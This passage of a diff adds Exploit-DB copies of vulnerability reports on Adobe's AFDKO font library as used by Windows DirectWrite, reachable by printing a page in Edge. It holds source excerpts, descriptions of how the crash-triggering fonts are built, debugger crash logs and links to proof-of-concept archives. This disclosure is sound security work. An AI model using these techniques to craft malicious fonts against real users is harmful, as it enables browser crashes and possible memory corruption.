+00000247`2b29aea0  00000247`2b296ed7 00000247`2b296ed8
+00000247`2b29aeb0  00000247`2b296ed9 00000247`2b296eda
+00000247`2b29aec0  00000247`2b296edb 00000247`2b296edc
+00000247`2b29aed0  00000247`2b296edd 00000247`2b296ede
+00000247`2b29aee0  00000247`2b296edf 00000247`2b296ee0
+0:039> k
+ # Child-SP          RetAddr           Call Site
+00 00000044`6973a9e8 00007ffd`100f5b52 DWrite!post2GetName+0x25
+01 00000044`6973a9f0 00007ffd`100f5d2b DWrite!readCharSetFromPost+0x1b6
+02 00000044`6973aa30 00007ffd`100f9b80 DWrite!readCharset+0x37
+03 00000044`6973aa60 00007ffd`100ed7f7 DWrite!cfrBegFont+0x680
+04 00000044`6973b500 00007ffd`10083a1f DWrite!AdobeCFF2Snapshot+0x10f
+05 00000044`6973ba00 00007ffd`10082ce1 DWrite!FontInstancer::InstanceCffTable+0x163
+06 00000044`6973bbf0 00007ffd`1008295e DWrite!FontInstancer::CreateInstanceInternal+0x239
+07 00000044`6973be10 00007ffd`100633de DWrite!FontInstancer::CreateInstance+0x182
+08 00000044`6973c170 00007ffd`1ca008e3 DWrite!DWriteFontFace::CreateInstancedStream+0x9e
+09 00000044`6973c200 00007ffd`1c9f28b9 d2d1!dxc::TextConvertor::InstanceFontResources+0x19f
+0a 00000044`6973c320 00007ffd`032b8394 d2d1!dxc::CXpsPrintControl::Close+0xc9
+0b 00000044`6973c370 00007ffd`03292760 edgehtml!CDXPrintControl::Close+0x44
+0c 00000044`6973c3c0 00007ffd`0329784d edgehtml!CTemplatePrinter::EndPrintD2D+0x50
+0d 00000044`6973c3f0 00007ffd`0315dc9d edgehtml!CPrintManagerTemplatePrinter::endPrint+0x2d
+0e 00000044`6973c420 00007ffd`02d9b665 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Trampoline_endPrint+0x45
+0f 00000044`6973c460 00007ffd`021aab4e edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Profiler_endPrint+0x25
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47101.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47102.txt b/exploits/windows/dos/47102.txt
new file mode 100644
index 000000000..94337afdf
--- /dev/null
+++ b/exploits/windows/dos/47102.txt
@@ -0,0 +1,263 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input. Below is a description of one such security vulnerability in Adobe's library exploitable through the Edge web browser.
+
+-----=====[ Description ]=====-----
+
+The AFDKO library has its own implementation of dynamic arrays, semantically resembling e.g. std::vector from C++. These objects are implemented in c/public/lib/source/dynarr/dynarr.c and c/public/lib/api/dynarr.h. There are a few interesting observations we can make about them:
+
+- Each dynamic array is initialized with the dnaINIT() macro, which lets the caller specify the initial number of items allocated on first access, and the increments in which the array is extended. This is an optimization designed to reduce the number of memory allocations, while making it possible to fine-tune the behavior of the array based on the nature of the data it stores.
+- An empty dynamic array object uses the "array" pointer (which normally stores the address of the allocated elements) to store the "init" value, i.e. the minimum number of elements to allocate. Therefore referencing a non-existing element in an empty dynarr typically results in a near-NULL pointer dereference crash.
+- Information such as element counts, indexes etc. is usually passed to the dna* functions as signed integers or longs. This means, for example, that calling dnaSET_CNT() with a nonpositive "n" argument on an empty array is a no-op, as "n" is then smaller or equal to the current cnt=0, and thus no allocation is performed.
+
+There are several places in AFDKO where dynamic arrays are used incorrectly in the following ways:
+
+- The size of a dynarr is set to 0 and the code starts operating on the dynarr.array pointer (wrongly) assuming that the array contains at least 1 element,
+- The size of a dynarr is set to a negative value (which keeps the array at the same length as it was before), but it is later used as an unsigned number, e.g. to control the number of loop iterations.
+
+Considering the current implementation of the dynarrays, both of the above situations lead to NULL pointer dereference crashes which are impossible to exploit for arbitrary code execution. However, this is due to pure coincidence, and if the internals of the dynamic arrays were a little different in the future (e.g. a malloc(0) pointer was initially assigned to an empty array), then these bugs would immediately become memory corruption issues. The affected areas of code don't respect the length of the arrays they read from and write to, which is why we are reporting the issues despite their seemingly low severity.
+
+We noticed the bugs in the following locations in cffread.c:
+
+--- cut ---
+  1900  static void buildGIDNames(cfrCtx h) {
+  1901      char *p;
+  1902      long length;
+  1903      long numGlyphs = h->glyphs.cnt;
+  1904      unsigned short i;
+  1905
+  1906      dnaSET_CNT(h->post.fmt2.glyphNameIndex, numGlyphs);
+  1907      for (i = 0; i < numGlyphs; i++) {
+  1908          h->post.fmt2.glyphNameIndex.array[i] = i;
+  1909      }
+  1910      /* Read string data */
+  1911      length = numGlyphs * 9; /* 3 for 'gid', 5 for GID, 1 for null termination. */
+  1912      dnaSET_CNT(h->post.fmt2.buf, length + 1);
+  1913      /* Build C strings array */
+  1914      dnaSET_CNT(h->post.fmt2.strings, numGlyphs);
+  1915      p = h->post.fmt2.buf.array;
+  1916      sprintf(p, ".notdef");
+  1917      length = (long)strlen(p);
+  1918      h->post.fmt2.strings.array[0] = p;
+  1919      p += length + 1;
+  1920      for (i = 1; i < numGlyphs; i++) {
+  1921          h->post.fmt2.strings.array[i] = p;
+  1922          sprintf(p, "gid%05d", i);
+  1923          length = (long)strlen(p);
+  1924          p += length + 1;
+  1925      }
+  1926
+  1927      return; /* Success */
+  1928  }
+--- cut ---
+
+In the above function, if numGlyphs=0, then there are two problems:
+
+- The length of the h->post.fmt2.buf buffer is set to 1 in line 1912, but then 8 bytes are copied into it in line 1916. However, because the "init" value for the array is 300, 300 bytes are allocated instead of just 1 and no memory corruption takes place.
+- The length of h->post.fmt2.strings is set to 0 in line 1914, yet the code accesses the non-existent element h->post.fmt2.strings.array[0] in line 1918, triggering a crash.
+
+Furthermore, in readCharset():
+
+--- cut ---
+[...]
+  2164          default: {
+  2165              /* Custom charset */
+  2166              long gid;
+  2167              int size = 2;
+  2168
+  2169              srcSeek(h, h->region.Charset.begin);
+  2170
+  2171              gid = 0;
+  2172              addID(h, gid++, 0); /* .notdef */
+  2173
+  2174              switch (read1(h)) {
+[...]
+--- cut ---
+
+where addID() is defined as:
+
+--- cut ---
+  1839  static void addID(cfrCtx h, long gid, unsigned short id) {
+  1840      abfGlyphInfo *info = &h->glyphs.array[gid];
+  1841      if (h->flags & CID_FONT)
+  1842          /* Save CID */
+  1843          info->cid = id;
+  1844      else {
+  1845          /* Save SID */
+  1846          info->gname.impl = id;
+  1847          info->gname.ptr = sid2str(h, id);
+  1848
+  1849          /* Non-CID font so select FD[0] */
+  1850          info->iFD = 0;
+[...]
+--- cut ---
+
+Here in line 2172, readCharset() assumes that there is at least one glyph declared in the font (the ".notdef"). If there aren't any, trying to access h->glyphs.array[0] leads to a crash in line 1843 or 1846.
+
+Lastly, let's have a look at readCharStringsINDEX():
+
+--- cut ---
+  1779  /* Read CharStrings INDEX. */
+  1780  static void readCharStringsINDEX(cfrCtx h, short flags) {
+  1781      unsigned long i;
+  1782      INDEX index;
+  1783      Offset offset;
+  1784
+  1785      /* Read INDEX */
+  1786      if (h->region.CharStringsINDEX.begin == -1)
+  1787          fatal(h, cfrErrNoCharStrings);
+  1788      readINDEX(h, &h->region.CharStringsINDEX, &index);
+  1789
+  1790      /* Allocate and initialize glyphs array */
+  1791      dnaSET_CNT(h->glyphs, index.count);
+  1792      srcSeek(h, index.offset);
+  1793      offset = index.data + readN(h, index.offSize);
+  1794      for (i = 0; i < index.count; i++) {
+  1795          long length;
+  1796          abfGlyphInfo *info = &h->glyphs.array[i];
+  1797
+  1798          abfInitGlyphInfo(info);
+  1799          info->flags = flags;
+  1800          info->tag = (unsigned short)i;
+[...]
+  1814      }
+  1815  }
+--- cut ---
+
+The index.count field is of type "unsigned long", and on platforms where it is 32-bit wide (Linux x86, Windows x86/x64), it can be fully controlled by input CFF2 fonts. In line 1791, the field is used to set the length of the h->glyphs array. Please note that a value of 0x80000000 or greater becomes negative when cast to long, which is the parameter type of dnaSET_CNT (or rather the underlying dnaSetCnt). As previously discussed, a negative new length doesn't change the state of the array, so h->glyphs remains empty. However, the loop in line 1794 operates on unsigned numbers, so it will attempt to perform 2 billion or more iterations, trying to write to h->glyphs.array[0, ...]. The first access to h->glyphs.array[0] inside of abfInitGlyphInfo() will trigger an exception.
+
+As a side note, in readCharStringsINDEX(), if the index loaded in line 1788 is empty (i.e. index.count == 0), then other fields in the structure such as index.offset or index.offSize are left uninitialized. They are, however, unconditionally used in lines 1792 and 1793 to seek in the data stream and potentially read some bytes. This doesn't seem to have any major effect on the program state, so it is only reported here as FYI.
+
+-----=====[ Proof of Concept ]=====-----
+
+There are three proof of concept files, poc_buildGIDNames.otf, poc_addID.otf and poc_readCharStringsINDEX.otf, which trigger crashes in the corresponding functions.
+
+-----=====[ Crash logs ]=====-----
+
+A 64-bit build of "tx" compiled with AddressSanitizer, started with ./tx -cff poc_buildGIDNames.otf crashes in the following way:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x000000000055694c in buildGIDNames (h=0x62a000000200) at ../../../../../source/cffread/cffread.c:1918
+1918        h->post.fmt2.strings.array[0] = p;
+
+(gdb) print h->post.fmt2.strings
+$1 = {ctx = 0x6020000000d0, array = 0x32, cnt = 0, size = 0, incr = 200, func = 0x0}
+
+(gdb) x/10i $rip
+=> 0x55694c <buildGIDNames+748>:        mov    %rcx,(%rax)
+   0x55694f <buildGIDNames+751>:        mov    -0x18(%rbp),%rdx
+   0x556953 <buildGIDNames+755>:        add    $0x1,%rdx
+   0x556957 <buildGIDNames+759>:        add    -0x10(%rbp),%rdx
+   0x55695b <buildGIDNames+763>:        mov    %rdx,-0x10(%rbp)
+   0x55695f <buildGIDNames+767>:        movw   $0x1,-0x22(%rbp)
+   0x556965 <buildGIDNames+773>:        movzwl -0x22(%rbp),%eax
+   0x556969 <buildGIDNames+777>:        mov    %eax,%ecx
+   0x55696b <buildGIDNames+779>:        mov    -0x20(%rbp),%rdx
+   0x55696f <buildGIDNames+783>:        mov    %rcx,%rdi
+(gdb) info reg $rax
+rax            0x32     50
+
+(gdb) bt
+#0  0x000000000055694c in buildGIDNames (h=0x62a000000200) at ../../../../../source/cffread/cffread.c:1918
+#1  0x0000000000553d38 in postRead (h=0x62a000000200) at ../../../../../source/cffread/cffread.c:1964
+#2  0x000000000053eeda in readCharset (h=0x62a000000200) at ../../../../../source/cffread/cffread.c:2139
+#3  0x00000000005299c8 in cfrBegFont (h=0x62a000000200, flags=4, origin=0, ttcIndex=0, top=0x62c000000238, UDV=0x0)
+    at ../../../../../source/cffread/cffread.c:2789
+#4  0x000000000050928e in cfrReadFont (h=0x62c000000200, origin=0, ttcIndex=0) at ../../../../source/tx.c:137
+#5  0x0000000000508cc4 in doFile (h=0x62c000000200, srcname=0x7fffffffdf46 "poc_buildGIDNames.otf") at ../../../../source/tx.c:429
+#6  0x0000000000506b2f in doSingleFileSet (h=0x62c000000200, srcname=0x7fffffffdf46 "poc_buildGIDNames.otf") at ../../../../source/tx.c:488
+#7  0x00000000004fc91f in parseArgs (h=0x62c000000200, argc=2, argv=0x7fffffffdc40) at ../../../../source/tx.c:558
+#8  0x00000000004f9471 in main (argc=2, argv=0x7fffffffdc40) at ../../../../source/tx.c:1631
+(gdb)
+--- cut ---
+
+A 64-bit build of "tx" compiled with AddressSanitizer, started with ./tx -cff poc_addID.otf crashes in the following way:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x000000000055640d in addID (h=0x62a000000200, gid=0, id=0) at ../../../../../source/cffread/cffread.c:1846
+1846            info->gname.impl = id;
+
+(gdb) print info
+$1 = (abfGlyphInfo *) 0x100
+
+(gdb) x/10i $rip
+=> 0x55640d <addID+397>:        mov    %rcx,(%rax)
+   0x556410 <addID+400>:        mov    -0x8(%rbp),%rdi
+   0x556414 <addID+404>:        movzwl -0x12(%rbp),%edx
+   0x556418 <addID+408>:        mov    %edx,%esi
+   0x55641a <addID+410>:        callq  0x548c30 <sid2str>
+   0x55641f <addID+415>:        mov    -0x20(%rbp),%rcx
+   0x556423 <addID+419>:        add    $0x8,%rcx
+   0x556427 <addID+423>:        mov    %rcx,%rsi
+   0x55642a <addID+426>:        shr    $0x3,%rsi
+   0x55642e <addID+430>:        cmpb   $0x0,0x7fff8000(%rsi)
+(gdb) info reg $rax
+rax            0x110    272
+
+(gdb) bt
+#0  0x000000000055640d in addID (h=0x62a000000200, gid=0, id=0) at ../../../../../source/cffread/cffread.c:1846
+#1  0x000000000053f2e9 in readCharset (h=0x62a000000200) at ../../../../../source/cffread/cffread.c:2172
+#2  0x00000000005299c8 in cfrBegFont (h=0x62a000000200, flags=4, origin=0, ttcIndex=0, top=0x62c000000238, UDV=0x0)
+    at ../../../../../source/cffread/cffread.c:2789
+#3  0x000000000050928e in cfrReadFont (h=0x62c000000200, origin=0, ttcIndex=0) at ../../../../source/tx.c:137
+#4  0x0000000000508cc4 in doFile (h=0x62c000000200, srcname=0x7fffffffdf4e "poc_addID.otf") at ../../../../source/tx.c:429
+#5  0x0000000000506b2f in doSingleFileSet (h=0x62c000000200, srcname=0x7fffffffdf4e "poc_addID.otf") at ../../../../source/tx.c:488
+#6  0x00000000004fc91f in parseArgs (h=0x62c000000200, argc=2, argv=0x7fffffffdc50) at ../../../../source/tx.c:558
+#7  0x00000000004f9471 in main (argc=2, argv=0x7fffffffdc50) at ../../../../source/tx.c:1631
+(gdb)
+--- cut ---
+
+A 32-bit build of "tx" compiled with AddressSanitizer, started with ./tx -cff poc_readCharStringsINDEX.otf crashes in the following way:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x0846344e in abfInitGlyphInfo (info=0x100) at ../../../../../source/absfont/absfont.c:124
+124         info->flags = 0;
+
+(gdb) print info
+$1 = (abfGlyphInfo *) 0x100
+
+(gdb) x/10i $eip
+=> 0x846344e <abfInitGlyphInfo+94>:     movw   $0x0,(%eax)
+   0x8463453 <abfInitGlyphInfo+99>:     mov    0x8(%ebp),%ecx
+   0x8463456 <abfInitGlyphInfo+102>:    add    $0x2,%ecx
+   0x8463459 <abfInitGlyphInfo+105>:    mov    %ecx,%edx
+   0x846345b <abfInitGlyphInfo+107>:    shr    $0x3,%edx
+   0x846345e <abfInitGlyphInfo+110>:    or     $0x20000000,%edx
+   0x8463464 <abfInitGlyphInfo+116>:    mov    (%edx),%bl
+   0x8463466 <abfInitGlyphInfo+118>:    cmp    $0x0,%bl
+   0x8463469 <abfInitGlyphInfo+121>:    mov    %ecx,-0x14(%ebp)
+   0x846346c <abfInitGlyphInfo+124>:    mov    %bl,-0x15(%ebp)
+(gdb) info reg $eax
+eax            0x100    256
+
+(gdb) bt
+#0  0x0846344e in abfInitGlyphInfo (info=0x100) at ../../../../../source/absfont/absfont.c:124
+#1  0x08190954 in readCharStringsINDEX (h=0xf3f00100, flags=0) at ../../../../../source/cffread/cffread.c:1798
+#2  0x081797b5 in cfrBegFont (h=0xf3f00100, flags=4, origin=0, ttcIndex=0, top=0xf570021c, UDV=0x0) at ../../../../../source/cffread/cffread.c:2769
+#3  0x08155d26 in cfrReadFont (h=0xf5700200, origin=0, ttcIndex=0) at ../../../../source/tx.c:137
+#4  0x081556e0 in doFile (h=0xf5700200, srcname=0xffffcf3f "poc_readCharStringsINDEX.otf") at ../../../../source/tx.c:429
+#5  0x08152fca in doSingleFileSet (h=0xf5700200, srcname=0xffffcf3f "poc_readCharStringsINDEX.otf") at ../../../../source/tx.c:488
+#6  0x081469a7 in parseArgs (h=0xf5700200, argc=2, argv=0xffffcd78) at ../../../../source/tx.c:558
+#7  0x08142640 in main (argc=2, argv=0xffffcd78) at ../../../../source/tx.c:1631
+(gdb)
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47102.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47103.txt b/exploits/windows/dos/47103.txt
new file mode 100644
index 000000000..386b36bf0
--- /dev/null
+++ b/exploits/windows/dos/47103.txt
@@ -0,0 +1,203 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input. Below is a description of one such security vulnerability in Adobe's library exploitable through the Edge web browser.
+
+-----=====[ Description ]=====-----
+
+While fuzzing the standard "tx" AFDKO utility using a "tx -cff <input file> /dev/null" command, we have encountered multiple crashes in the CFF Writer (cfw) component of the FDK. These crashes are triggered in the cfwSindexAssignSID() function in the afdko/c/public/lib/source/cffwrite/cffwrite_sindex.c file:
+
+--- cut ---
+   158  /* Assign the next custom SID to the specified custom string. */
+   159  SID cfwSindexAssignSID(cfwCtx g, SRI index) {
+   160      sindexCtx h = g->ctx.sindex;
+   161      if (index < STD_STR_CNT) {
+   162          return index;
+   163      } else {
+   164          CustomRec *custom = &h->custom.array[index - STD_STR_CNT];
+   165          if (custom->sid == SID_UNDEF) {
+   166              custom->sid = h->nextid++;
+   167          }
+   168          return custom->sid;
+   169      }
+   170  }
+--- cut ---
+
+In all cases, the exception is thrown in line 165, and is caused by an out-of-bounds access to h->custom.array[] due to the "index" argument being equal to 65535 (0xffff). The two different invocations of cfwSindexAssignSID() which trigger the crash are found in the cfwDictFillTop() function in cffwrite/cffwrite_dict.c (lines 520 and 522):
+
+--- cut ---
+   517      /* ROS */
+   518      if (top->sup.flags & ABF_CID_FONT) {
+   519          cfwDictSaveInt(dst,
+   520                         cfwSindexAssignSID(g, (SRI)top->cid.Registry.impl));
+   521          cfwDictSaveInt(dst,
+   522                         cfwSindexAssignSID(g, (SRI)top->cid.Ordering.impl));
+   523          cfwDictSaveInt(dst, top->cid.Supplement);
+   524          cfwDictSaveOp(dst, cff_ROS);
+   525      }
+--- cut ---
+
+The cause of the problem is that the top->cid.Registry.impl and/or top->cid.Ordering.impl fields are set to 0xffff while executing the above code, and they are treated as valid indexes into h->custom.array, even though they contain the special marker values.
+
+The "Registry" and "Ordering" strings are initialized when a cff_ROS operator is encountered while loading an input DICT structure in readDICT (cffread/cffread.c):
+
+--- cut ---
+  1287                      case cff_ROS:
+  1288                          CHKUFLOW(3);
+  1289                          top->cid.Registry.ptr = sid2str(h, (SID)INDEX_INT(0));
+  1290                          top->cid.Ordering.ptr = sid2str(h, (SID)INDEX_INT(1));
+  1291                          top->cid.Supplement = INDEX_INT(2);
+  1292                          h->flags |= CID_FONT;
+  1293                          break;
+--- cut ---
+
+Later on, these strings are added to the string index of the output font in cfwDictCopyTop (cffwrite/cffwrite_dict.c):
+
+--- cut ---
+   193      /* Add strings to index */
+   194      addString(g, &dst->version);
+[...]
+   204      addString(g, &dst->cid.Registry);
+   205      addString(g, &dst->cid.Ordering);
+   206  }
+--- cut ---
+
+where addString() is defined as:
+
+--- cut ---
+    59  /* Add string to string index. */
+    60  static void addString(cfwCtx g, abfString *str) {
+    61      str->impl = cfwSindexAddString(g, str->ptr);
+    62  }
+--- cut ---
+
+where in turn cfwSindexAddString() is defined as (cffwrite/cffwrite_sindex.c):
+
+--- cut ---
+    99  /* Add string. If standard string return its SID, otherwise if in table return
+   100     existing record index, else add to table and return new record index. If
+   101     string is empty return SRI_UNDEF. */
+   102  SRI cfwSindexAddString(cfwCtx g, char *string) {
+   103      sindexCtx h = g->ctx.sindex;
+   104      size_t index;
+   105      StdRec *std;
+   106
+   107      if (string == NULL || *string == '\0') {
+   108          return SRI_UNDEF; /* Reject invalid strings */
+   109      }
+[...]
+--- cut ---
+
+As a result, it should be possible to set cid.Registry.impl and/or cid.Ordering.impl to SRI_UNDEF (0xffff) with non-existent or empty strings. The cfwEndFont() function attempts to protect against this situation by checking if the string pointers are not equal to ABF_UNSET_PTR:
+
+--- cut ---
+  1875          /* Validate CID data */
+  1876          if (top->cid.Registry.ptr == ABF_UNSET_PTR ||
+  1877              top->cid.Ordering.ptr == ABF_UNSET_PTR ||
+  1878              top->cid.Supplement == ABF_UNSET_INT) {
+  1879              return cfwErrBadDict;
+  1880          }
+--- cut ---
+
+However these checks are insufficient, as it is still possible to make cfwSindexAddString() return SRI_UNDEF for correctly initialized, but empty strings. This results in passing 0xffff as an argument to cfwSindexAssignSID(), which triggers out-of-bounds reads in lines 165 and 168 in cffwrite_sindex.c, and potentially an OOB write in line 166. Under specific conditions, this may lead to memory corruption and arbitrary code execution.
+
+-----=====[ Proof of Concept ]=====-----
+
+The CFF table inside the proof of concept poc.otf font has the strings "Adobe" and "Identity" (corresponding to the Registry and Ordering fields) modified to "\0dobe" and "\0dentity". As the strings appear to be empty to cfwSindexAddString(), the SRI_UNDEF value is returned and later passed to cfwSindexAssignSID(), which triggers a crash.
+
+The font is also specially crafted to parse correctly with DirectWrite but trigger the bug in AFDKO. The original CFF2 table was left untouched, and another, modified CFF table from an external CID-keyed font was added with the tag "CFF ". This way, DirectWrite successfully loads the legitimate variable font, and AFDKO processes the modified version as the CFF table takes precedence over CFF2 due to the logic implemented in srcOpen() in afdko/c/public/lib/source/cffread/cffread.c.
+
+-----=====[ Crash logs ]=====-----
+
+A 64-bit build of "tx", started with ./tx -cff poc.otf crashes in the following way:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x0000000000424ac2 in cfwSindexAssignSID (g=0x6fd890, index=65535) at ../../../../../source/cffwrite/cffwrite_sindex.c:165
+165             if (custom->sid == SID_UNDEF) {
+
+(gdb) print custom
+$1 = (CustomRec *) 0x81cb40
+(gdb) print custom->sid
+Cannot access memory at address 0x81cb48
+(gdb) print index
+$2 = 65535
+
+(gdb) x/10i $rip
+=> 0x424ac2 <cfwSindexAssignSID+98>:    movzwl 0x8(%rax),%ecx
+   0x424ac6 <cfwSindexAssignSID+102>:   cmp    $0xffff,%ecx
+   0x424acc <cfwSindexAssignSID+108>:   jne    0x424af3 <cfwSindexAssignSID+147>
+   0x424ad2 <cfwSindexAssignSID+114>:   mov    -0x20(%rbp),%rax
+   0x424ad6 <cfwSindexAssignSID+118>:   mov    0x90(%rax),%cx
+   0x424add <cfwSindexAssignSID+125>:   mov    %cx,%dx
+   0x424ae0 <cfwSindexAssignSID+128>:   add    $0x1,%dx
+   0x424ae4 <cfwSindexAssignSID+132>:   mov    %dx,0x90(%rax)
+   0x424aeb <cfwSindexAssignSID+139>:   mov    -0x28(%rbp),%rax
+   0x424aef <cfwSindexAssignSID+143>:   mov    %cx,0x8(%rax)
+(gdb) info reg $rax
+rax            0x81cb40 8506176
+
+(gdb) bt
+#0  0x0000000000424ac2 in cfwSindexAssignSID (g=0x6fd890, index=65535) at ../../../../../source/cffwrite/cffwrite_sindex.c:165
+#1  0x0000000000421b94 in cfwDictFillTop (g=0x6fd890, dst=0x71b3f0, top=0x71b148, font0=0x7ffff75b9010, iSyntheticBase=-1)
+    at ../../../../../source/cffwrite/cffwrite_dict.c:520
+#2  0x000000000041b6db in fillSet (h=0x6fdbd0) at ../../../../../source/cffwrite/cffwrite.c:1059
+#3  0x000000000041ae7c in cfwEndSet (g=0x6fd890) at ../../../../../source/cffwrite/cffwrite.c:2128
+#4  0x000000000047a79c in cff_EndSet (h=0x6f6010) at ../../../../../source/tx_shared/tx_shared.c:1076
+#5  0x000000000040533f in doSingleFileSet (h=0x6f6010, srcname=0x7fffffffdf1b "poc.otf")
+    at ../../../../source/tx.c:489
+#6  0x0000000000402f59 in parseArgs (h=0x6f6010, argc=2, argv=0x7fffffffdc20) at ../../../../source/tx.c:558
+#7  0x0000000000401df2 in main (argc=2, argv=0x7fffffffdc20) at ../../../../source/tx.c:1631
+(gdb)
+--- cut ---
+
+A similar Microsoft Edge renderer process crash is also shown below:
+
+--- cut ---
+(4c7c.2a54): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+DWrite!cfwSindexAssignSID+0x21:
+00007ffc`c59ea471 663984caccf3ffff cmp     word ptr [rdx+rcx*8-0C34h],ax ds:000001b6`7296ed24=????
+
+0:037> ? rcx
+Evaluate expression: 65535 = 00000000`0000ffff
+0:037> ? rdx
+Evaluate expression: 1883117648224 = 000001b6`728ef960
+
+0:037> k
+ # Child-SP          RetAddr           Call Site
+00 00000080`c43ab518 00007ffc`c59eb0e1 DWrite!cfwSindexAssignSID+0x21
+01 00000080`c43ab520 00007ffc`c59e01cd DWrite!cfwDictFillTop+0x179
+02 00000080`c43ab570 00007ffc`c59e219d DWrite!fillSet+0x61
+03 00000080`c43ab5e0 00007ffc`c59d2314 DWrite!cfwEndSet+0x51
+04 00000080`c43ab620 00007ffc`c596157a DWrite!AdobeCFF2Snapshot+0x23c
+05 00000080`c43abb20 00007ffc`c5960729 DWrite!FontInstancer::InstanceCffTable+0x212
+06 00000080`c43abd00 00007ffc`c596039a DWrite!FontInstancer::CreateInstanceInternal+0x249
+07 00000080`c43abf20 00007ffc`c5945a4e DWrite!FontInstancer::CreateInstance+0x192
+08 00000080`c43ac280 00007ffc`d4ae61ab DWrite!DWriteFontFace::CreateInstancedStream+0x9e
+09 00000080`c43ac310 00007ffc`d4ad9148 d2d1!dxc::TextConvertor::InstanceFontResources+0x19f
+0a 00000080`c43ac430 00007ffc`b4465464 d2d1!dxc::CXpsPrintControl::Close+0xc8
+0b 00000080`c43ac480 00007ffc`b443fd30 edgehtml!CDXPrintControl::Close+0x44
+0c 00000080`c43ac4d0 00007ffc`b44448bd edgehtml!CTemplatePrinter::EndPrintD2D+0x5c
+0d 00000080`c43ac500 00007ffc`b431b995 edgehtml!CPrintManagerTemplatePrinter::endPrint+0x2d
+0e 00000080`c43ac530 00007ffc`b3f79485 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Trampoline_endPrint+0x45
+0f 00000080`c43ac570 00007ffc`b34344c1 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Profiler_endPrint+0x25
+[...]
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
